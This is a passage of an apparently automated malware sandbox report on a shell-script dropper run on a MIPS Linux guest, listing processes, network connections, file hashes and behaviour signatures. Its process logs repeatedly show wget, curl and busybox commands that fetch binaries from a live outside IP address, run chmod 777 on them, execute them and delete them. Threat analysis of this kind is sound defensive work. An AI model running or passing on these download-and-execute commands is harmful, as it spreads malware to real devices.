[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:20
Reported
2024-10-25 01:23
Platform
debian9-mipsel-20240611-en
Max time kernel
78s
Max time network
79s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
Processes
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
